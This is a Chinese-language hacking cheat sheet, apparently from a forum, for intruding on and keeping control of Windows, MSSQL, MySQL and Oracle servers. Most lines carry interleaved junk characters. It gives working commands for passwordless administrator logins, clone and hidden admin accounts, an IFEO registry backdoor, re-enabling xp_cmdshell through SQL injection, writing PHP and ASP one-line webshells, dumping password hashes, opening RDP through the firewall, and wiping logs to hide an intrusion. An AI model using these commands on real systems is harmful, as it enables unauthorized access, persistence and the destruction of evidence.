- L. Y# `0 z: {3 s" \1.net user administrator /passwordreq:no7 y' L1 Z. v& n
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
6 d7 @8 |" j: Y( J, |2.比较巧妙的建克隆号的步骤
' e8 p5 X1 O/ H8 ` d& I! P先建一个user的用户: k, y1 ~% [' d% e+ e4 y; D2 t
然后导出注册表。然后在计算机管理里删掉
' _# Q( A/ @1 K5 ^: ^在导入,在添加为管理员组
, l( @, G( d0 {2 a: t, E) i3.查radmin密码* n* u u) t4 P8 x) s8 r; [% C
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg: l" ?7 X7 P6 N7 }. O0 n
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]* {3 M5 g8 U+ `* F
建立一个"services.exe"的项 r3 N% i9 z9 t9 y* a0 L
再在其下面建立(字符串值)
- _3 ? l& l- |. b) P6 e' _键值为mu ma的全路径3 p" Z7 \$ g# h3 B6 F/ o5 @
5.runas /user:guest cmd& T& O: F2 Z* G0 g- c" _& s8 B
测试用户权限!3 p# E" Q2 m5 ~* M$ {6 D
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?" O0 y( [6 n1 F; B/ B& X/ Q
7.入侵后漏洞修补、痕迹清理,后门置放:
$ N; o* m$ Y7 v6 |6 _, }0 `基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
( _8 t( x+ P' x: ~4 p/ C( S8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
0 C- ]8 B$ l! b
. F$ i+ P. l2 i# K7 efor example, y8 t$ l# M! t& ?
+ ~8 b' j5 {1 Q) [7 D8 K& y
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'- j6 t+ }( l4 r- B7 X+ E, p
Q7 W( c& D# }1 u
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'. m; w4 k& Y: d) y8 M( g
7 i& Z9 C2 A; g& m1 ^: {0 n
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
5 u' m2 x6 y3 R2 q8 ?! v如果要启用的话就必须把他加到高级用户模式, F2 V# X9 |# I( J1 Q# z
可以直接在注入点那里直接注入
, Y* ~! V1 m$ Y, V# h- cid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
; t, r4 {- q) X- r然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--5 s. `1 Y- G. [) C6 W) S! W
或者
7 X% q: \/ q4 }4 ~sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
! P( f. ~( P/ r2 f- V& _1 M来恢复cmdshell。
P$ [( u6 t. `" L) U: n5 i$ V
) x- C, {: H1 ]- l分析器
! H8 t$ M# p/ w1 s/ zEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
9 l( G2 ?0 n+ \, F) l5 e' z然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")$ u E# C8 b& z4 m( ]3 \
10.xp_cmdshell新的恢复办法
! |# @% S9 A! C. b( ]4 L4 kxp_cmdshell新的恢复办法/ k3 @& L1 }" H. A- D
扩展储存过程被删除以后可以有很简单的办法恢复:6 @" Q4 Z1 m* u
删除4 \- u7 }/ r* `7 F
drop procedure sp_addextendedproc; T. N1 v3 d3 V
drop procedure sp_oacreate3 K) N- ~) z) J k0 `' j+ A) H
exec sp_dropextendedproc 'xp_cmdshell', z: ?8 ]4 I. j0 t" W: G/ v1 c
3 }8 _7 x. f" w2 t ?: i( `9 d
恢复
; q8 ~/ t B1 _/ o, n7 Ddbcc addextendedproc ("sp_oacreate","odsole70.dll")
. g t& N: Z7 S9 |! c. W% Kdbcc addextendedproc ("xp_cmdshell","xplog70.dll")& g3 o7 E f: I: O
- f0 E2 e. W' W
这样可以直接恢复,不用去管sp_addextendedproc是不是存在# R8 G2 J) u1 c( D ?+ Z
& j- d: j' v# I7 O/ R
-----------------------------
* t0 U9 m0 E* \5 P! ^7 ]9 V) f5 T! `. T+ P2 }9 N; z
删除扩展存储过过程xp_cmdshell的语句:
G5 n e! Z& q) y% i2 Xexec sp_dropextendedproc 'xp_cmdshell'0 I1 ?; L; W; ?% s
' X0 S' x$ P3 L# H4 r: q
恢复cmdshell的sql语句
; z+ [6 m! p1 H/ ~exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
t+ O( Y7 J, P2 y% h3 q- N' ~( d: V8 p, x
- ~3 O1 z! o1 W; r, ]2 Y( E
4 Q$ Y7 u: m0 L$ f6 L0 ?开启cmdshell的sql语句
2 F S8 H. r1 h. v
5 X; L2 v, f/ W1 d- o. q8 Aexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
0 ]* H/ s- }9 m" X* |& v5 V( x0 f
: M; p. R5 U3 F7 I% Q0 |; V判断存储扩展是否存在
1 N z8 U; Z0 v/ hselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
* P# i( v x5 d1 ~& n: o9 m7 @返回结果为1就ok
* ~6 k" ]4 m; v( Y9 Y9 l
1 d! D( d( L. Y恢复xp_cmdshell
$ U2 L) {* j2 Rexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'. c% H$ h' R5 P
返回结果为1就ok$ c9 K# n. a% Q3 z1 L& g
$ x$ \' P' o5 F; a% t7 i
否则上传xplog7.0.dll
( l/ S% g6 d! l9 x( Iexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
; b! C% l9 b# m$ x8 C
5 o' o# {4 ], J2 e/ z p堵上cmdshell的sql语句
: Z/ |' J; |8 I# Fsp_dropextendedproc "xp_cmdshel5 B# m) F# h; Q F$ q
-------------------------
+ {( @$ Q# c( `( X$ Z. E; v清除3389的登录记录用一条系统自带的命令:
; ]! }. h6 k6 L- Rreg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
2 W8 ]! ?6 S r! s8 F0 {, J
4 h* b/ d& D/ @+ ?% W2 T然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
9 W9 B+ P+ y {( Q1 e7 j在 mysql里查看当前用户的权限. Y/ G. |. A3 H" ]7 z
show grants for & W7 d- h; g0 W
) \6 u B# H3 t3 \% X% D
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。2 ~! ~4 Y+ a1 Z( [% z
7 B; `( n3 U. q8 M* e
% u) x6 q8 B9 s- G/ ^Create USER 'itpro'@'%' IDENTIFIED BY '123';
8 N- m/ f! A' U- u2 @! t) H/ L' u& u4 U
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
7 @5 h d; V9 q, p1 i% L7 [; l2 J, f* E4 s6 b7 A
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
- g! L2 I( m: u! v. z
, S# c3 \) l* W( c6 \$ c! b; YMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;( d8 R( W( u7 j
1 P# Y4 `- `7 L# C( h' H# \. d" W
搞完事记得删除脚印哟。) m' p% u, z1 F4 o0 h( B; P
g! b$ Z" T- S( X$ V& E: y
Drop USER 'itpro'@'%';- h7 V0 v4 S. j: k0 G. z* b+ t: [
% v9 ]0 s$ ?# S* B; V/ W4 E% J2 L
Drop DATABASE IF EXISTS `itpro` ;5 a. `8 J% L% O
' _5 U+ y+ c8 }! z6 S' G
当前用户获取system权限
7 B6 b1 G: | m0 B8 S" jsc Create SuperCMD binPath= "cmd /K start" type= own type= interact
+ C I7 B' C0 L/ Msc start SuperCMD; N( m: j O& [* v; o! I
程序代码
' s! z0 }: M, Z5 j* y3 W* p8 v<SCRIPT LANGUAGE="VBScript">
8 m5 o$ o% q6 T9 G$ k3 Bset wsnetwork=CreateObject("WSCRIPT.NETWORK")5 g2 l8 `; a% ~
os="WinNT://"&wsnetwork.ComputerName
9 G4 i p% \- BSet ob=GetObject(os)' d' m ]& d' J( o9 a: ~1 [
Set oe=GetObject(os&"/Administrators,group")
- O* U# ^) B RSet od=ob.Create("user","nosec")
/ p! P. F* w9 t- k' Iod.SetPassword "123456abc!@#"
/ ?' S& _" W: e+ U! dod.SetInfo7 s$ J3 B2 T/ P; @ b
Set of=GetObject(os&"/nosec",user)+ o( o/ \" i6 Z. h5 [
oe.add os&"/nosec"
5 q% C2 c) i0 g2 v2 U</Script>6 U$ q8 ~; i# N2 @9 L/ A; d. P
<script language=javascript>window.close();</script>
: p" F# u+ l4 r6 |
9 w" o, u: E P4 w: }; w. F- B* A F9 e3 j
* x8 n- M! K7 M! [3 B! ^/ g4 k. ^& M) ~4 J; ` B3 r
突破验证码限制入后台拿shell
& F, k! L9 j7 B" \8 C/ X程序代码0 A) E* ?" k0 [' H0 z
REGEDIT4 # V0 V0 I- J" ^4 {3 G+ `
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] c0 V( a7 }( q& i
"BlockXBM"=dword:000000003 o, L6 [5 K9 G
4 J, }& a1 Y8 B8 a( n! I
保存为code.reg,导入注册表,重器IE
" i4 ?/ D2 `5 P2 ~4 g& y7 r就可以了
% ~4 {0 T6 n" L' N. Z" V% N/ _union写马1 W; M9 \/ v; }1 M9 [9 x2 U( `
程序代码4 t% p/ M. m* e6 f- d0 V
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
/ [0 v- n! v" N! B2 b# w: X7 k3 \( ~4 x4 f) c8 ? X q) H, h
应用在dedecms注射漏洞上,无后台写马
9 b+ v: L% V( O# c2 I0 ]6 S4 `- \+ Zdedecms后台,无文件管理器,没有outfile权限的时候5 z4 A8 f& z7 G" M" n$ f) b
在插件管理-病毒扫描里+ \7 M) }. \1 _+ g- k
写一句话进include/config_hand.php里% _$ `/ `8 S* ?8 k
程序代码) f2 l9 l; e3 \ d* y
>';?><?php @eval($_POST[cmd]);?>
6 f4 A- n: j" f/ ~
U9 ^: h6 m! C5 e) Q- m9 ^3 C* O
1 D' m2 o9 W; ?9 X$ p# s' I如上格式7 e5 p9 e" C/ f! f- b r
/ U; ]9 w% o$ G$ @
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
- m" H$ w! Z) c程序代码
" M5 n0 F0 a: w' {" k) g8 Y( fselect username,password from dba_users;
]9 P7 `- T" @4 N+ x& {- w0 S3 B: x5 @8 ~ L
4 X" E6 y3 h5 I/ c* m& emysql远程连接用户2 I/ E! W7 u' L- j! U
程序代码0 ]: M# i4 n' q1 f4 W3 Z: i7 Z. Z
- x% @- P, Y$ `$ t. n
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
: Q9 ?9 m+ L/ hGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
: v$ \8 y/ r" v5 xMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0& d# [+ o9 m3 Z* @5 s# R2 {. W @0 c+ F
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0; i% c1 k b) P) @% ~9 Z- l) U' e
: U4 P# L6 z+ m. h3 Z
/ `, x4 V9 }* Q3 g {0 t! y1 i9 n ?) ^3 ]5 N: O
5 y; ?6 G$ v. r# F" t
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0" s) A3 K" C% O7 E, f- B
2 ?3 I9 O1 t J8 s1.查询终端端口' `2 k( }+ p z q4 O9 K
. Z$ A/ V) d7 f. p0 l' dxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
$ S, ~2 O; F" L1 {3 w' v2 T! @' M- R7 P3 L+ c# {; P( t& h
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp", F0 c- x6 h' c+ a: P; p
type tsp.reg( k$ [! O3 x0 v7 M2 H
4 @, n; K. W9 _; o. g! P2.开启XP&2003终端服务
% x4 g {8 d/ E$ g8 p4 N
1 n% d9 K9 q+ r) E) C
4 _) J) b- n5 {& U% ?REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f( S! W- b! ^5 C; f$ T. y
7 z/ \4 z0 G; r+ H1 Y+ G) ^- I8 }/ \: K- b5 t) p+ Q `0 g
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
* g6 B% L d- {# e
- a* o3 Z& @1 t3.更改终端端口为20008(0x4E28)
) ?, _/ a/ H- a% F _; g6 G o+ @) h
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f% \# v% y. W. U+ ~
) v) i% B. ]" V5 ^REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f2 s( ], N# s$ z( S7 B
6 h: B) V: G5 d. [* ?+ w8 i4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制+ x1 ]" `$ j$ v: w2 P
0 o7 @; k; {; t. h" w' yREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f c* i: S- U. H- \$ o/ k5 D) E$ i
' {2 \( I9 Z7 L* L2 N% K- l; j; w- i1 o% ?
5.开启Win2000的终端,端口为3389(需重启), _. a& C$ @2 t6 ~6 m
' B G4 Q( O# O" H+ Q
echo Windows Registry Editor Version 5.00 >2000.reg
& G. X$ R# w' |/ z9 i6 }echo. >>2000.reg
0 y8 U& l8 i: f4 Hecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg 8 m! P6 W/ K7 z9 z% B. |' c& M
echo "Enabled"="0" >>2000.reg
- a( ?- d! h/ z( ?2 k5 G% [echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
7 W% e J* Y! Z! ~echo "ShutdownWithoutLogon"="0" >>2000.reg
1 m" }! r4 e/ ]echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
( m+ }+ a# e+ ]3 b2 H: Recho "EnableAdminTSRemote"=dword:00000001 >>2000.reg % `, P H( `" g& n
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg 6 P, M, H: X0 |1 J- N& i
echo "TSEnabled"=dword:00000001 >>2000.reg 4 G" v- {2 v5 ^3 b3 U; J. p( q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
5 r0 C- b, N6 Z+ xecho "Start"=dword:00000002 >>2000.reg 6 p! V' r. [/ M0 \4 J
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg 9 e8 K( _* ^# `9 E+ I* i0 u
echo "Start"=dword:00000002 >>2000.reg 0 D7 b: P3 ~# `6 q ]
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
; c8 X& ]) P% W$ u$ R) Qecho "Hotkey"="1" >>2000.reg
# [- n5 O3 E3 A2 Jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
- t1 m1 @4 M4 t. D/ O; `echo "ortNumber"=dword:00000D3D >>2000.reg * [7 ?2 H% ~8 X
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg ( x% K- ^9 a' W
echo "ortNumber"=dword:00000D3D >>2000.reg; \# V, b$ @* F4 x% P
+ w+ t4 ?# r n5 F, u' X* k6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)1 r) v% \# T; j2 p3 @
& W6 Z+ I4 L9 g) Q@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
6 f0 m; w4 J0 G0 A9 U(set inf=InstallHinfSection DefaultInstall)( p$ W G$ x% x: L; x5 w
echo signature=$chicago$ >> restart.inf
, H3 m# Q* p1 o+ Zecho [defaultinstall] >> restart.inf) J& t6 K O7 x; d0 g
rundll32 setupapi,%inf% 1 %temp%\restart.inf* m6 A- n1 Q8 P! {
" V- K6 ]- G/ R# \5 _
8 \7 p' d" k1 T, T4 k& k- @1 X/ ?7.禁用TCP/IP端口筛选 (需重启)
2 ]6 t% W8 ?+ [0 k: a& a& F2 X" |$ r9 G9 u
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
1 q" R; O: M* N. z$ Y E, O
) c8 I7 f2 H: u* `* n, A9 p8.终端超出最大连接数时可用下面的命令来连接
' L e5 T7 I3 }8 f, v: X9 L& d' F( o" A
mstsc /v:ip:3389 /console% G" z) U( c* o! d
/ [8 Q, o6 `5 [4 B5 D9.调整NTFS分区权限# e( i2 E+ @" `. ?" \+ L8 N- x
6 n- A( K: d4 U, z Vcacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
1 l3 [1 b( s$ h) t) l8 f" k
0 |& j6 M8 z; m4 H" t6 y& ~( |6 gcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
) U4 ]5 p4 w) J1 I
) b6 b2 T7 x8 U J! b------------------------------------------------------8 f7 G) a' _5 n7 L" c. y
3389.vbs ' B" C7 L$ b2 J0 H8 F7 O- P
On Error Resume Next
2 n/ ?1 T, ]4 Gconst HKEY_LOCAL_MACHINE = &H80000002
. c( J1 U1 U5 qstrComputer = "."& t6 ^( C% _' [. E' t
Set StdOut = WScript.StdOut
( ~. j* C: y' C3 G/ L9 O5 j/ K' VSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_( d" g5 a# _# G% x, K" {1 n- n% }
strComputer & "\root\default:StdRegProv")7 P/ E" k7 R5 C6 r* W6 e
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server": v# V, a* X" L0 ] G0 A+ D
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath- M( g3 a ]; k8 N+ _$ `/ j0 O$ ^: C: I
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
, M' N* ~4 R! D; j4 goreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath) R5 i7 U* N# N3 x( P+ O" }" Z* [9 A# p
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
D0 v) U2 y6 ]; k4 Q! xstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
5 I7 P# \2 v8 l) l' mstrValueName = "fDenyTSConnections"2 O8 f& d0 E/ {5 U9 n
dwValue = 0: m: |9 A7 S$ E
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
$ D+ P( h6 P0 P/ V0 @, hstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
, k- P( j! D% D8 ~! h* f: Q. k1 KstrValueName = "ortNumber": T. z! x: e; B+ ~/ r( t: B5 q
dwValue = 3389
/ N) @! V! [: r$ y5 B4 Z) yoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue1 C) L' J+ e7 E6 Q' e
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp") \" X- Z* ~; `1 r) s: q& x1 M
strValueName = "ortNumber"
0 L. B6 @" w7 ]5 n9 D2 kdwValue = 33890 I3 V, @4 L8 @ E" I8 I
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
* U3 x7 o: [9 fSet R = CreateObject("WScript.Shell") 9 P9 w* }$ T/ e. q6 H
R.run("Shutdown.exe -f -r -t 0") - }2 Z2 j' F) y% ^$ L4 q
# m" O$ U9 ], V7 {6 B
删除awgina.dll的注册表键值
8 x' A! T$ G0 O6 X# z程序代码
1 Y% Q8 f' y/ k. _8 _% B6 [" Q
6 D7 c7 a/ s9 M9 v- I |reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
; q3 ^, P# V4 f/ S0 u& V4 ]/ l% \& T6 C7 K4 J+ V5 S8 U- d
+ b, O; r# w) L' o# v) H& s
' }& E* q9 x5 I7 l2 J9 S
0 x' W" w# H. A" L" F; d程序代码
4 y) D [* x6 \( Q5 MHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
" C% c1 w/ ]$ V$ F. \9 K% P4 H
8 J9 h5 d) E. u4 u" V, v设置为1,关闭LM Hash
1 K' ~% M3 o6 X& H( b v* c K: j; c
数据库安全:入侵Oracle数据库常用操作命令) W% k4 r' ~; q) J% L9 Y
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。- D/ F, t& U9 l6 t
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。" |5 O( y1 Z4 P( ]; C3 v
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;1 k2 N! Z+ H5 E! } U
3、SQL>connect / as sysdba ;(as sysoper)或
# n* p8 u+ T7 ?6 h+ cconnect internal/oracle AS SYSDBA ;(scott/tiger)
3 T/ u# o) D2 F, q2 k, |conn sys/change_on_install as sysdba;7 P' J; m* M# z6 T" r! I
4、SQL>startup; 启动数据库实例4 L6 X+ Z1 e- ?- v& u( M0 D3 _
5、查看当前的所有数据库: select * from v$database;- s/ R" s5 J% b0 J9 L, Y
select name from v$database;) s9 i/ U2 `8 p/ ]" Y' C! b
6、desc v$databases; 查看数据库结构字段! x) |7 X; n# W6 l7 A* x) o
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
& ^# h; @! ?/ H! wSQL>select * from V_$PWFILE_USERS;. {- q+ {2 u3 h/ S. U- C) N, n
Show user;查看当前数据库连接用户) K2 [0 R8 X- A o! y
8、进入test数据库:database test;# E! S* ?+ y" [2 q& r. Q/ G/ q
9、查看所有的数据库实例:select * from v$instance;3 `! Z! P7 ~* M: l1 M+ z3 o- }# V
如:ora9i
! J7 i; F' J( v* i' ?4 T6 |10、查看当前库的所有数据表:% o2 X" R3 j) F5 w% z4 E
SQL> select TABLE_NAME from all_tables;
' `! s0 P( f) `select * from all_tables;
0 N, B5 ~; [2 s: j. F* P* C4 MSQL> select table_name from all_tables where table_name like '%u%';% t+ j* a+ ]% n
TABLE_NAME
* h* R. r7 g# h" L------------------------------
- Z' B; x7 R7 N s; j_default_auditing_options_) G: |, I* w8 f8 }- p! S9 b
11、查看表结构:desc all_tables;
) n9 y5 p" y/ g5 ?, f$ A) U) W& H4 u12、显示CQI.T_BBS_XUSER的所有字段结构:
; l% ?6 r/ j) K' M) L0 ndesc CQI.T_BBS_XUSER;
/ i3 S5 T! u# |- V; q! U13、获得CQI.T_BBS_XUSER表中的记录:
/ I7 b) z$ j( G1 j4 H# oselect * from CQI.T_BBS_XUSER;: i% V! F8 x" q4 ?1 e2 B
14、增加数据库用户:(test11/test): y% i# D. I5 I. P0 `5 Q
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;9 y9 h) J% r% J; e! ^
15、用户授权:% q7 L* f; _8 V& @
grant connect,resource,dba to test11;" V* A0 T' X/ D4 Q. K5 N% {
grant sysdba to test11;
" h" K: X4 K) S8 M! M1 M# }commit;
0 F# x5 u# y! L16、更改数据库用户的密码:(将sys与system的密码改为test.)) }+ i# @: ?- t, m9 ]$ n8 J
alter user sys indentified by test;2 J9 B- x$ w5 p$ r; D0 c) F) i
alter user system indentified by test;. i& e9 N' `0 P9 I4 c/ v4 U4 U
. b/ @( Q' v/ S0 z7 |# w# H
applicationContext-util.xml
4 u: Y9 F* M% f' X8 eapplicationContext.xml
0 {* G4 D% S" P8 j5 s8 Kstruts-config.xml
$ x3 x T9 S& a) l; N( D9 Dweb.xml) V* Z; w: b: z+ A4 }
server.xml. I0 t6 c* Y# n
tomcat-users.xml" y" C, W. V3 [; M8 |$ @! j% q
hibernate.cfg.xml! d* |- f% R0 i6 B* O2 R
database_pool_config.xml8 G; X- E% v6 ]
3 ~5 P1 I0 j* D3 ^0 l: I6 z. q+ E
& k& b/ ]) q3 ~5 f7 N\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置2 n$ S- m, z3 m4 {
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini8 v* f7 x9 K( m/ ^0 @
\WEB-INF\struts-config.xml 文件目录结构7 x% O! K# ]7 ~' N1 R
3 {+ s8 D, o5 h/ Z- x; t' {spring.properties 里边包含hibernate.cfg.xml的名称% [: Y" ?4 K1 h9 X
' z- c, `0 U B* H% O# H* K$ v
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
* ]0 j2 |" k, K3 l# U4 |
% c1 q q+ s, L1 r* j" f9 g如果都找不到 那就看看class文件吧。。& A4 r1 M0 M! L$ r3 H/ p! N _0 W
9 `% N& l7 b2 B4 h) ^0 l( Z测试1:
6 Z% x' @9 l/ W$ u2 WSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
+ D# q) x5 O- a
p+ x$ i5 d1 G4 j! L5 \' M: l测试2:" Q2 J" P% c( U
6 m, Y( m( E2 w" ]6 q u' A0 n2 ^- ~
create table dirs(paths varchar(100),paths1 varchar(100), id int)
$ k' X& `. E& o! F0 w0 [- Q* z5 ~
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
; p: x* _+ B0 S m" M& O* @6 H8 Q0 P
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
( Y4 G- j: ?, E+ g7 X+ \* z* I! G; i1 v! \& V2 q& P$ O# R
查看虚拟机中的共享文件:3 D% C7 E' v! G# c% F
在虚拟机中的cmd中执行
r: ^6 ]3 G7 X7 ~9 t\\.host\Shared Folders
" X4 a( r& [- M
' [% i J* B. t7 {1 Ucmdshell下找终端的技巧
! C$ K0 o8 j/ L7 b$ C8 |找终端:
7 P% a' f* T2 V' d6 i第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
: M- E% V( ~: s5 M' o% c3 ? 而终端所对应的服务名为:TermService u1 ^% C5 D2 o
第二步:用netstat -ano命令,列出所有端口对应的PID值!
$ L6 l8 R6 G( q 找到PID值所对应的端口
/ X$ L6 q& g. p( n
! J' {1 D. v' o$ I' c8 [1 M. E查询sql server 2005中的密码hash
6 D6 X h7 a4 v8 tSELECT password_hash FROM sys.sql_logins where name='sa'7 |# C' _. z4 m
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
) L; d# i) ?0 v4 M: q3 V7 c$ }access中导出shell
( Y4 v) H8 ]7 C) h6 ] @
: `5 h* v! W, u2 r. s9 y中文版本操作系统中针对mysql添加用户完整代码:
' p; w3 o' o) Y8 I( V' y, W6 X# K: s4 V
use test;
. I' N2 J2 a/ |$ f2 gcreate table a (cmd text);
* E% C# {3 X: A; h: q: U% ninsert into a values ("set wshshell=createobject (""wscript.shell"") " );
